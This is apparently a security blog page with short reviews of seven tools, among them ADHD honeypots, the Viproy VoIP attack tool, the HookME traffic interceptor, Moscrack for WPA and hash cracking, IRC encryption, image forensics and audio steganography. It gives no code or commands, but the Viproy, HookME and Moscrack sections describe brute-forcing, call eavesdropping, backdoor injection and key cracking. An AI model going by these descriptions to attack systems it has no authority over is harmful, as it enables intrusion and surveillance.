Hacker 10 – Security Hacker

Category: Other

Other computing tips

  • The Active Defense Harbinger Distribution

    The Active Defense Harbinger Distribution

    The Active Defense Harbinger Distribution is a security Linux distribution based on Ubuntu 12.04 Long Term Support, Ubuntu LTS has 5 years support from Ubuntu developers Canonical, it is useful for enterprises and those who don’t need to run cutting edge software and are more interested in an stable operating system that will be supported for a long time without the need to constantly upgrade to another version to patch up security holes.

    ADHD announces itself as an active defence distribution with preconfigured strike back tools, able to interfere with an attacker’s system fingerprinting, the first reconnaissance stage previous to a hacking attack. Just like Ubuntu, you can run ADHD as a live DVD or install it in your computer, when you first boot you will be given the choice of logging in as adhd user or guest user, the login password is adhd. The default window manager is the lightweight XFCE, you could change it using Synaptic package manager, a package management tool for Debian that can be used to install, remove and upgrade software packages.

    The Active Defense Harbinger Distribution (ADHD)
    The Active Defense Harbinger Distribution (ADHD)

    On the surface you will not appreciate too many differences in between The Active Defense Harbinger Distribution and any other end user Linux distribution, it comes with The Gimp and gThumb for image editing, the full LibreOffice suite to work with documents, Thunderbird and Firefox, Catfish to search documents, basic network tools to ping, traceroute, port scan, finger and whois computer IPs, Xchat for IRC, Zenmap scanner, Gigolo, a front end to connect to remote file system, Parole Media player to watch videos, gmusic browser and Gwibber, an open source microblogging tool with access to the most popular social networking services like Twitter and Flickr. The most geeky tool included in ADHD is pgAdmin to edit PostgreSQL databases you will not find any hacking or penetration testing software on the list.

    The Active Defense Harbinger Distribution protects you deploying honeypots that waste an attacker’s time, alert the administrator of the attack while still harmless and gathers information on the sources of the attack.

    One of ADHD main defences is The Network Obfuscation and Virtualized Anti-Reconnaissance (Nova), it doesn’t use signature based detection for malware, instead it creates decoy systems for an attacker to interact with and alert the system administrator via email or logs that someone is attacking a dummy folder, port, etc. You can have infinite recursive directories so the attacker never really gets to his target or you can instruct Nova to automatically shut down a port when someone touches it.

    The Active Defense Harbinger Distribution system monitor
    The Active Defense Harbinger Distribution system monitor

    ADHD also comes with Honeybadger, able to create a webpage that looks like a Cisco administration interface or something interesting for an attacker to access, the dummy page can run a Java app on the attacker’s machine, gather his IP address and add it to a report page with Google API showing approximate information about an attacker’s computer IP location in the world.

    The best thing of The Active Defense Harbinger Distribution is that you should not notice it is there until something happens, on the minus side there are no offensive tools other than gathering attacker’s information but you could add more aggressive digital tools with the package manager.

    Visit ADHD homepage

  • Penetrate Voice over IP servers with Viproy

    Penetrate Voice over IP servers with Viproy

    Viproy is a tool for testing SIP servers security, the Session Initiation Protocol is widely used for voice and video calls over IP, the software comes with different modules performing specific tasks, all of the modules support debugging and verbose mode, this is a Linux only command line tool, instructions are included and it should not be difficult for a Linux beginner to understand them.

    Software modules consist of options, register, invite, enumerator, brute force, trust analyzer and SIP proxy, you can set target networks and port numbers. Before carrying out any attack you should fingerprint and enumerate SIP services first, after that you should register with the server and start intercepting, making calls or create havoc at will.

    Viproy VoIP penetration tests include targeting a local client address and port, discovering SIP services with valid credentials, setting username and password in Asterisk PBX, issuing direct invites and spoofing without credentials, enumerating all users, launching a denial of service to all valid users so that nobody can accept calls and brute forcing a target account or numeric range using a dictionary list to test users password strength.

    Viproy VoIP penetration testing and hacking tool
    Viproy VoIP penetration testing and hacking tool

    Viproy homepage lists a vulnerable VoIP server where you can evaluate your hacking skills without harming anybody, in a real life scenario after successful hacking a VoIP server you can listen in or record inbound and outbound calls as well as setting up usernames and passwords, the damage that can be done will depend no how many vulnerabilities exist, not all of the modules will be necessary successful penetrating the server.

    Another tool you might want to add to your VoIP hacking arsenal is SIPVicious suite you can use it to audit VoIP systems scanning SIP devices IP range and cracking SIP PBX. VPN services protect VoIP calls in transit but the first and last point remain vulnerable, it is possible to listen in to a VoIP encrypted call by hacking into a server before encryption takes place or when the call is decrypted at the end of the line.

    Visit Viproy homepage

  • Intercept communications with data tampering tool HookME

    Intercept communications with data tampering tool HookME

    HookME is a free open source Windows tool to intercept network communications hooking up desired processes and API calls, including SSL clear data, the unencrypted SSL headers.

    The software download is initially tiny (125Kb), when you try to install it you will get a message saying it requires supplemental .dll and .db files to work, over 30MB of files will be automatically downloaded by HookME from a third party site, you will also be asked to register the new .dll dependencies giving administrative rights to Windows Command Processor, the installation process could make some people feel uneasy about this tool containing malware, the only guarantee you have is that HookME is developed by well known OSINT FOCA creators.

    Every time you start the software you will be shown a small Netkra Deviare unregistered license splash screen, you don’t have to buy a license but it will get rid of the initial screen if you do.

    TCP data tampering tool HookME
    TCP data tampering tool HookME

    The software has a tabbed user interface that can be used to intercept any hooked API call and read the data that is being sent and received, you can change intercepted packets in real time, dropping or forwarding them, a Python plugin system allows for anyone to create their own custom addon, there are some templates for that. HookME developer showed in BlackHat Europe 2013 conference how to easily intercept MySQL data and inject a backdoor on the fly with a few clicks executing remote commands.

    Real time intercepted data can be seen in the user interface Hex editor showing you hexadecimal numbers and their corresponding text meaning, you can highlight data packets and click on the “Drop” or “Forward” buttons, a small window below the program lets you know what process is hooked, for example it will show firefox.exe if you are eavesdropping on a Firefox browser session.

    This tool can be used for penetration testing creating malware and backdoors in network protocols or to uncover rootkits hooking up API calls, the main challenge for an attacker to use HookME against you would be getting access to your network first.

    Visit HookME homepage

  • Moscrack wireless WPA cracking with cluster computers

    Moscrack wireless WPA cracking with cluster computers

    The Multifarious On-demand Systems Cracker is a Perl application based on Aircrack-NG to crack wireless WPA keys using cluster computers, it can be deployed in Mosix, an operating system distributed across multiple Linux machines taking advantage of conglomerated computer processors or run in collective SSH nodes, clusters can be build up with any Unix operating system, including the iPhone, MacOSX, or Windows and Cygwin, it has also been tested on an Android phone running as a SSH node, best of all you can run Moscrack on the cheap from the Amazon EC2 cloud computing platform.

    The program splits a word list into chunks and processes them in parallel in between all of the nodes. If you don’t have access to a computer cluster it is possible to use Moscrack with CUDA,  an NVIDIA parallel computing platform implemented in graphics cards, you will need to install  aircrack-ng-cuda and adjust moscrack.conf (configuration file).

    Moscrack cloud wireless WPA cracking
    Moscrack cloud wireless WPA cracking

    Moscrack command line interface shows a word list progress expressed in percentage, estimated completion time, running time, server status, cluster speed and other very complete verbose data, GUI interface is optional, it will be more suitable that you run the command line version to feel comfortable from the shell helping you to understand how concepts work, the GUI is pretty basic.

    The program has been designed to run for weeks or months, you can leave it on and forget about the program until the job is done, functions go beyond WPA cracking, adding the Dehasher plugin will compare SHA256/512, DES, MD5 and Blowfish hashes to crack them, if you don’t wish to install this tool in your computer, a Moscrack Live CD running Suse Linux is available for download.

    Visit Moscrack homepage

  • Internet Relay Chat encryption with Dirt

    Internet Relay Chat encryption with Dirt

    Dirt is an open source project adding FiSH compatible chat encryption to any IRC client, it can be used as Socks4 proxy or bouncer. Dirt only allows localhost (127.0.0.1) connections, this is to make sure that encrypted text will not leak out of your machine, the listening port for Socks4 is 1088 and the 6666 port is used when acting as a bouncer, settings can be changed modifying “dirt.ini” with a text editor.

    After installation you will notice a Dirt icon in your system tray, to use Dirt in mIRC, a popular Windows IRC chat client, you need to access Tools>Options>Connect>Firewall and enter the appropriate hostname (127.0.0.1) and port number. Once connected you can type /dirt to see a list of all possible commands,

    mIRC dirt encryption IRC chat
    mIRC dirt encryption IRC chat

    For those not aware, FiSH is a widely available IRC plugin providing Blowfish encryption grade to IRC chat, you can find it in the Linux command line irssi IRC client and many others. If you use a Mac computer or Debian Linux you could try FiSHLiM, a plugin for FiSH IRC encryption working in XChat and HexChat IRC chat clients.

    Dirt works in Windows, Linux and BSD but it is still in development, another alternative could be using psyBNC, an IRC bouncer that replaces your computer IP with a virtual host (vHost) and supports channel encryption with Blowfish and IDEA algorithm, you will need a shell account to manage psyBNC, there are many companies offering them at cut-prize with easy configuration instructions, they are normally used by channel administrators to handle abuse.

    Visit Dirt IRC encryption homepage

  • Free online image forensic analysis at Fotoforensics

    Free online image forensic analysis at Fotoforensics

    Fotoforensics is a website for advance photo analysis, you can check whether a photo has been modified or not and see embedded metadata that could contain private details, the photos can be uploaded from your PC or directly linked from a URL, there is an optional Firefox browser plugin to make image forensic analysis easier, any image that can be displayed on your browser can be analysed, the plugin gets around sites like Facebook requiring login to view a photograph.

    The service supports .jpeg and .png image formats, the most common image file extensions found on the Internet, the metadata analysis can find out if a graphics editor has been used to modify the image, ACD See for example will embed the program name on the photos it saves, metadata also shows how many times the image has been edited, identity attributes and how the image was managed.

    Image computer forensics Fotoforensics
    Image computer forensics Fotoforensics

    To determine if a photograph has been forged Fotoforensics will use Error Level Analysis to see the image modification percentage, the image will be saved at different compression levels and then compared with a computational algorithm to see the amount of change, this is not an 100% accurate method to detect fake photos, it is possible to defeat image computer forensics algorithms looking at high frequency decomposition by reducing colour, brightness or contrast but there are other photo attributes that can be analysed.

    The website has a very detailed tutorial and FAQ explaining what results you can expect and how to interpret them, you should read it to understand what you are seeing, this is not a tool that will tell you a “Yes” or “No” answer, it is up to you to interpret the results which could turn up to be inconclusive.

    You could use this tool to check that your EXIF image cleaner is working properly but do not upload anything private because the results are saved in a public URL on the server, uploading pornography is not allowed,  to check if an X-rated celebrity photo is real or not you will need to find another place or they will ban your computer IP.

    Visit Fotoforensics homepage

  • Hide data inside sound files with DeepSound

    Hide data inside sound files with DeepSound

    DeepSound is a steganography tool to hide any kind of data, from text to photos, inside sound files, for extra security everything can be encrypted using AES256-bit and only available with the correct password, the modified audio file will play as normal and nobody should notice it contains hidden data inside. The program interface is very simple, it comes with a file browser to manually peruse the directory where a suitable carrier sound file can be found, when password protecting the data you will not be asked to confirm the black dot covered password twice, if you make a typo you will not notice it until it is too late, it will be best if you test the file after creating it to make sure everything works as expected.

    Encoding or extracting data can be quickly executed using shortcuts, the program settings allow you to graduate output quality ratio from low to high. If you are going to create an audio CD with hidden data the developer advises to disable volume normalization in the CD burning software to prevent data corruption that would stop hidden files recovery, a one page help manual with screenshots is included, you are not likely to have to read it.

    DeepSound hides data inside audio files
    DeepSound hides data inside audio files

    This tool can only hide data inside Waveform Audio File Format .wav and Free Lossless Audio Codec .flac sound files, these are not very common files, .wav is normally uncompressed, perfect to hide files inside, but the files are very large and not usually used for music, only small sounds.

    FLAC is a royalty free open source alternative to proprietary .mp3, .flac files are compressed and suitable for music albums, supporting metadata and album covert art, if you are going to hide data it will probably look less suspicious inside a .flac than the inadequate .wav file format, and it will be easier to distribute a .flac file given its smaller size. This application could also be used to watermark copyrighted music and track down the source if it is later found leaked in file sharing networks, but converting the file audio format to something else would get rid of the hidden watermark.

    Visit DeepSound homepage